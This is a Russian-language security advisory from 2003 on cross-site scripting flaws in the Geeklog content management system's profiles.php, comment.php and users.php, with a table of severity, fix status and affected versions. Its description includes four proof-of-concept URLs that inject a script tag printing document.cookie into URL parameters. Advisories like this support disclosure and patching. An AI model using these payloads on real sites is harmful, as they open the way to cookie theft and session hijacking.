Межсайтовый скриптинг в Geeklog
| Дата публикации: | 17.01.2003 |
| Всего просмотров: | 1090 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Межсайтовый скриптинг |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Geeklog 1.x |
| Описание: | Geeklog - система управления Web содержанием. Сценарии 'profiles.php', 'comment.php' и 'users.php' уязвимы к межсайтовому скриптингу из-за недостаточного санирования данных пользователя, представленных в URL параметрах. Пример:
http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie) </script> --2-- http://vulnerable.host/users.php?mode=profile&uid=<script> alert(document.cookie)</script> --3-- http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=< script>alert(document.cookie)</script> --4-- http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com &subject=hello&message=text&uid=<script>alert(document.cookie)</script>Уязвимость обнаружена в Geeklog 1.3.7 |
| Ссылки: | Multiple XSS in Geeklog 1.3.7 |